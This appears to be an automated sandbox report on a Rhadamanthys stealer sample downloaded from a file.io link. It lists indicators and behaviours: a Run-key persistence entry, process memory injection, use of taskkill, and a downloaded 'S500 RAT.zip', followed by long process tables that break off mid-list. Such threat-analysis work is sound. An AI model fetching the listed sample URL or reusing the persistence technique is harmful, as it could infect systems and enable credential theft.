Malware Analysis Report

2024-11-15 05:59

Sample ID 240404-s8exjabf9v
Target https://file.io/k3MVzAZvKJCU
Tags
rhadamanthys persistence pyinstaller stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://file.io/k3MVzAZvKJCU was found to be: Known bad.

Malicious Activity Summary

rhadamanthys persistence pyinstaller stealer upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Executes dropped EXE

UPX packed file

Loads dropped DLL

Adds Run key to start application

Detects Pyinstaller

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-04 15:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-04 15:47

Reported

2024-04-04 15:49

Platform

win11-20240221-en

Max time kernel

128s

Max time network

132s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1616 created 2204 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\sihost.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" C:\Users\Admin\explorer.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4072 wrote to memory of 4284 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4284 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/k3MVzAZvKJCU

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd657e3cb8,0x7ffd657e3cc8,0x7ffd657e3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

